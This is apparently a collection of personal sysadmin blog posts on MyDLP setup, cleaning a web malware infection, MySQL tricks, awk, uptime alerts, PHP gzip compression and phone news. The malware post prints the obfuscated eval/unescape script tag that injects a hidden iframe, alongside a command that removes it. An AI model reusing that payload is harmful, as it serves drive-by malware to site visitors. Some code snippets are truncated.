Setting up a MyDLP server

MyDLP is a free and open source data loss prevention software that runs with multi-site configurations on network servers and endpoint computers. MyDLP is currently supported only on Ubuntu. You can download a preconfigured MyDLP Server Installation Disk Image from the MyDLP website. This is a short article on how I setup MyDLP on a brand new server system.

Install Ubuntu

I had an Ubuntu 12.04 (Precise Pangolin) image available, and decided to use it for the new server. Since the server system did not have an Optical Drive, I had to create a bootable USB media. For creating the bootable USB drive from the ISO file, I used Linux Live USB Creator from on a Windows PC. The procedure was simple

  1. Select the USB Media (USB Key)
  2. Choose the source media (ISO file / CD ROM)
  3. Optionally, configure the advanced options. (I disabled the VirtualBox options, since the USB drive will be used only as an installation media)
  4. Click on the lightning button to create the bootable USB drive

Plugin the USB drive to your computer. Boot to BIOS settings and select the USB drive as the primary hard disk. Save the changes and restart. If everything went fine, the system will boot to the Ubuntu installation screen.

Install MyDLP

If you are not installing Ubuntu from the the pre configured MyDLP Server Installation Image, you need to install MyDLP separately. To install MyDLP, the MyDLP repository  needs to be added to apt repositories list.

First of all, install the public key for the repository
wget -q -O - | sudo apt-key add -

Once the key is successfully installed, add the MyDLP repository using
sudo add-apt-repository "deb precise main"

Update apt to reload the repositories.
sudo apt-get update

Now that the repository is configured, we are ready to install MyDLP and its dependencies.
sudo aptitude install mydlp mydlp-appliance squid3-ssl

During the installation process, you will be prompted to set MySQL root password. MyDLP had trouble connecting to the MySQL database, when I used a non-empty password. So when you are installing for the first time, it is better to leave the passwords blank.

If the installation completed successfully, you will be able to login to the MyDLP web UI by visiting

The default username and password for the MyDLP web appliance is mydlp. Replace with your server ip address, if you are installing on a remote server.

Now you should be having a Squid proxy server listening on port 3128 of the server. To test the new DLP server, add some test policy rules using the MyDLP web UI. Update your router firewall to block direct internet access from your workstations. Configure the workstations to use the squid server installed on your new server as proxy server. Try browsing the internet from the workstation. If your server is properly setup, you can see that your requests are blocked / allowed based on your configured rules. The blocked requests will be listed in the logs section of web UI for audit purpose.

I used iptables on my TomatoUSB router to transparently redirect all traffic through my proxy server. The main advantage of configuring the proxy at the router level is that you don’t have to configure each workstation separately. Also, you can easily configure the router to block all internet access, except through the proxy.

Removing uy7gdr5332rkmn malware

Recently I got a mail from my hosting provider that few of my sites were distributing malware. I connected to my server and found out that all the index files had the following script tag appended to them.

<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->

The decoded version of the code is
document.write('<iframe src="" width="1" height="1"></iframe>');

Removing the code manually was impossible, since a number of sites were affected and few of the sites had several levels deep directory hierarchy.

Once again unix shell commands came to my rescue. The following command will remove the script from .html, .htm and .php files. If you have other extensions like .tpl modify the command accordingly

find . \( -name "*.html" -o -name "*.htm" -o -name "*.php" \) -print0 | xargs -0 perl -p -i -e "s#<script>eval\(unescape\('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%35%35%38%39%39%32%31%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'\)\);</script><\!-- uy7gdr5332rkmn -->##"

Make sure you run the above command from your account root directory (which is usually your FTP user’s home directory), because the malware affects the default error documents too, which are sometimes located outside the document root (In Plesk the document root is ~/httpdocs and the error documents are located in ~/error_docs )

Please keep in mind that your duty doesn’t end with disinfection. The above code will only remove the malicious code from the pages. It will not prevent the files from getting infected again. Most of the times the malware is uploaded via compromised FTP accounts (stolen password / brute forced account). Make sure you change your FTP password. If possible setup password less login via SFTP.

Extract single/multiple tables from MySQL dumpfile

An year back I posted on how to extract a single table from a MySQL dump file. Today, I decided to write a shell script to automate the whole process. Now it is possible to extract a single table or a range of tables from a dump file with a single command.


The script can be invoked with and without any parameters. The script usage is

./ mydumpfile.sql tablename tablename2

All parameters are optional. If the third argument is provided, the script will extract all tables from tablename to tablename2. If it is not specified, only tablename will be extracted.

If first and/or second argument(s) are/is omitted, the script goes into interactive mode, allowing you to select the file and table name. The interactive mode also allows you to view a list of all the tables in the dump file. You can extract a group of tables or a single table.


It took me a few hours to write the code. So, with the hope that someone will find this useful, I am releasing the code under MIT, BSD and GPL licenses. Feel free to contact me, if you are a fan of another license :)


The script can be downloaded from Github. The current version is 1.0.
MySQL Dump Table Extractor

History of User Agent string

If you are a web developer, you would have definitely seen the User Agent strings of the common web browsers. I have always wondered why the UA string began with Mozilla for browsers like Internet Explorer and Opera, which are not based on Mozilla code. I found the answer on WebAIM blog.

History of the browser user-agent string

This is the part that I liked the most

And then Google built Chrome, and Chrome used Webkit, and it was like Safari, and wanted pages built for Safari, and so pretended to be Safari. And thus Chrome used WebKit, and pretended to be Safari, and WebKit pretended to be KHTML, and KHTML pretended to be Gecko, and all browsers pretended to be Mozilla, and Chrome called itself Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/ Safari/525.13, and the user agent string was a complete mess, and near useless, and everyone pretended to be everyone else, and confusion abounded.

View currently running MySQL queries in realtime

Today I was playing around with Apache Solr. I was really impressed by its text searching capability, especially the MoreLikeThis search handler. I wanted to configure the DataImportHandler to import data directly from my MySQL database. It was really easy to configure, and I was able to perform a full import quickly. But when I tried to do a delta import, I found that it was not working as expected. Even though I was calling the delta import, it was causing a full import.

You might be wondering  why I am saying all these here. Well, I suspected that the problem was actually because of my SQL query for delta load.  But to be sure, I wanted to see the query being executed by Solr DataImportHandler. As always I turned to Google for assistance, and I finally reached the MySQL documentation on the General Query Log. Voila! This was exactly what I wanted. All I had to do was use the –log=[filename] parameter and all my queries will be logged to the specified log file. Nice, isn’t it?

Now I have to stop my running MySQL server and restart it with the –log switch, in addition to the other regular options. But there was a problem, I was not sure of the other required parameters. You can use the ps utility, when the MySQL server is running, to find out the normal parameters.

ps -ax | grep mysql

For me the output was

/usr/local/mysql/bin/mysqld –basedir=/usr/local/mysql –datadir=/usr/local/mysql/data –user=mysql –pid-file=/usr/local/mysql/data/ –port=3306 –socket=/tmp/mysql.sock

Now shutdown the MySQL server.

// On Mac
/Library/StartupItems/MySQLCOM/MySQLCOM stop

// For other Linux/Unix variants try
/etc/init.d/mysqld restart
service mysql restart

Start mysqld with –log option

/usr/local/mysql/bin/mysqld --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data --user=mysql --pid-file=/usr/local/mysql/data/ --port=3306 --socket=/tmp/mysql.sock --log=/tmp/query.log

The general query log contains lots of irrelevant information. To view the log after filtering out the unwanted details use tail and grep as given below

tail -f /tmp/query.log | grep -v Connect | grep -v Quit

The amount of information added to the file is quite large. If you are using this on a production server, I recommend turning off the logging once you are done.

Split header and footer into separate files using awk

Recently I had to write a shell script to read a file and split it into header and footer. The header and footer were to be saved into different files. At first I decided to write a script to loop through the file and save the content after performing the necessary condition check. But later I decided that this is not the best solution and checked whether there was a single line command for the same. As usual, I found a simple solution to the problem with awk.

awk '{if (NR == 1)print >> "header.txt"; else print >> "body.txt";}' input.txt
Where NR is a built-in variable that contains the number of the current record / line,
input.txt is the input file,
header.txt is output file for header,
body.txt is the output file for the remaining content

Awk reads the input file (input.txt) line by line and checks whether the current line is the first line. If so the content is appended ( >> ) to the file header.txt. Else the content is appended to body.txt.

Get free sms alerts when your website is down

Every webmaster wants their websites to have 100% uptime. But the truth is that not even Google is able to ensure that. So the next best thing we can hope for is to be informed whenever a website goes down, so that the necessary actions can be initiated to bring it back online. Unfortunately, it is not possible nor viable to constantly monitor your website and check whether it is up or not. Hence we go for uptime monitoring services like Pingdom,, BasicState etc. The best uptime monitoring services charge a premium fee for using their service. Fortunately, the monitoring services mentioned above have a cut down version of their premium service available for free. Most of the times the free service will be limited in frequency of check, alert methods, detailed statistics, number of checks etc. In fact, none of the free uptime monitoring services I had used provided free sms alerts directly. They either require us to pay or use our own sms gateway subscription.

Everything I have mentioned so far might be known to you already. So why put a false title? Well, I am not finished yet. Yes, you can get a free every minute uptime check with free sms notification when your website is down, depending on your location and mobile service provider.

Pingdom is one of the best uptime monitoring services available. I had been their premium subscriber till last month. When my subscription period was about to end, I started looking for an alternative, since I felt I was not using my subscription fully. I was using only one check, and a premium account allowed up to 5 checks. Most of the free service I checked were limited in frequency of checks (max being every 5 mins). Finally I came across Pingdom’s twitter account and found that they were offering free accounts with one every min check. There was also 20 free sms credits available with the account. What happens once that is over? Their alert methods also includes sending direct messages to your Twitter account. Now twitter allows sms updates for tweets from people you follow. By setting up Direct Message alert in Pingdom and following PingdomAlert on Twitter with sms alerts turned on, you can get unlimited free sms alerts when your website is down.

When you are depending on two services, it is possible that problem with any of providers can cause delay’s and reduce the overall effectiveness of the system. Even if Pingdom sends the alert within a minite, there is no guarantee that twitter will send the sms alert on time. If you have a critical application, do not rely on such an unreliable setup and go for a premium subscription. When I checked, I got sms notifications within 1 min of receiving a Direct Message. Also, sms check is not much important for me since I have my mailbox open most of the time, and usually detect downtimes within 5 mins from email alerts. Your case might be different, so use at your own risk.

Enabling gzip compression if mod_deflate is not enabled

Today I saw a tweet by my friend Niyas that Host Gator does not support mod_gzip. This made me wonder whether it is possible to achieve this using PHP. I contacted HostGator support and confirmed that GZip support for PHP is enabled on both shared and dedicated hosting accounts, whereas mod_deflate Apache module is available only for dedicated hosting customers. Fortunately, we can use PHP to compress files on the fly.

Enabling gzip compression in an existing PHP file is very simple. Add the following line at the beginning of the file (it should appear before any output statement).

ob_start ("ob_gzhandler");

Very simple, right? But what if we have hundreds of files to edit? Don’t worry, there is solution for that too. We can use the PHP configuration variable auto_prepend_file to automatically include the above code at the beginning of all PHP files. Copy the above code to a file named prepend.php and place it at the root of your website (~/public_html in CPanel, ~/httpdocs in Plesk).

Now we are going to automatically include the above file at the beginning of all PHP files using auto_prepend_file. Depending on how PHP is configured on your server, the steps for modifying the PHP configuration variable is also different.

If PHP is configured in CGI/FastCGI mode (HostGator uses this mode), we will be using php.ini file to make the above change. Create a file named php.ini at the root of your website and copy the following code into it. If the file already exists, append it to the end of the file.


If PHP is loaded as apache module (mod_php), we will have to use .htaccess to achieve the same effect. Create a file named .htaccess at the web root and copy the following code into it. If the file exists, append at the end of the file.

php_value auto_prepend_file <full-path-to-document-root>/prepend.php

In both methods, replace <full-path-to-document-root> with the full path to your website root directory, for example /home/joyce/public_html.

Now the prepend.php file is automatically included by the PHP interpreter, whenever a PHP file is requested. But this method (as of now) does not work for non PHP files like HTML, CSS, JavaScript etc, which should also be compressed. This is because these files are handled directly by Apache and is not passed to the PHP interpreter. To ensure that these files are also compressed, we have to instruct Apache to pass these files to the PHP interpreter before sending them to the browser. For this, lets once again go back to .htaccess. Append the following code at the end of your .htaccess file (create one, if you don’t have  it already).

<FilesMatch "\.(htm|html|css|js)">
	ForceType application/x-httpd-php

The above code instructs Apache that files ending with .js, .htm, .html, .css and .js extensions are also PHP files and should be passed through PHP interpreter. The only problem remaining is that Content-type header for all files have been changed to text/html. To fix this we need to check the requested file-name and set the correct Content-type header depending on the file extension. In order to do this, open prepend.php and replace the current code with

// Start output buffering
ob_start ("ob_gzhandler");

// Set the correct content type header depending on filename
$arContentType = array('htm' => 'text/html', 'html' => 'text/html', 'css' => 'text/css', 'js' => 'text/javascript');
if(strpos($_SERVER['REQUEST_URI'], '.') !== FALSE){
	$ext = explode('.', $_SERVER['REQUEST_URI']);
	$ext = array_pop($ext);
	if(($pos = strpos($ext, '?')) !== FALSE){
		$ext = substr($ext, 0, $pos);
		header ("Content-type: {$arContentType[$ext]}; charset: UTF-8");

// You can also set expiration headers in this file

That’s all Folks. You have successfully enabled Gzip compression on your server without using any Apache modules.

This is a working code. But I have tested it only with mod_php configuration. You have to be very careful when enabling PHP code in JS/CSS files. There may be many flaws in this code. If you find any, please let me know. We can further improve this code by adding expiration and cache headers to enable client side caching.

Apple to fight Google back?

The past year has seen Google increasingly becoming a rival of Apple. The competition between the two companies have been growing with the intrusion of Google into fields ruled by Apple. It began with Android and expanded through Google Chrome and Chrome OS. This led to the resignation of Google CEO Eric Schmidt from Apple’s Board of Directors. Now with the release of the new Google Phone (Nexus One), the two companies have become direct competitors.

It looks like Apple has finally decided to fight back by entering Google’s arena with the acquisition of the mobile ad company Quattro. Google had recently acquired AdMob, a four year old ad network, which had risen to be one of the most important players in the Mobile Ad industry. The deal is under scrutiny by the U.S. regulators. There were rumors that Apple also wanted to buy AdMob, but was out-bidden by Google.

The acquisition also puts Apple in direct competition with other companies like Microsoft and Yahoo.

Nexus One released. Not available in India

The waiting has come to an end. The Google Phone a.k.a Nexus one has been finally released. Official webpage of the phone at has also gone live.

Technical specifications of the phone can be found here. The device designed by Google and built by HTC is powered by a 1GHz Snapdragon processor and 512MB of ROM & 512MB of RAM. It includes features like GPS, accelerometer, proximity sensor, a 5 mega pix camera with LED flash and an additional microphone for noise cancellation. With a weight of 130 gms and a thickness of 11.5mm, Google boasted that the handset is no thicker than a number two pencil, and no heavier than a Swiss Army knife.

Unfortunately, the phone is not available in India. I see the following message when visiting the official webpage

Sorry, the Nexus One phone is not available in your country.

According to the sales page of the phone, Nexus One is currently available only in the U.S. The phone is available for a contract free price of $529 or a subsidized rate of $179 on a two year contract with T-Mobile. The page says that the Google phone will be available in US from Verizon wireless and in Europe from Vodafone in spring 2010.

The phone can be personalized with a two line engraving at the back of the phone.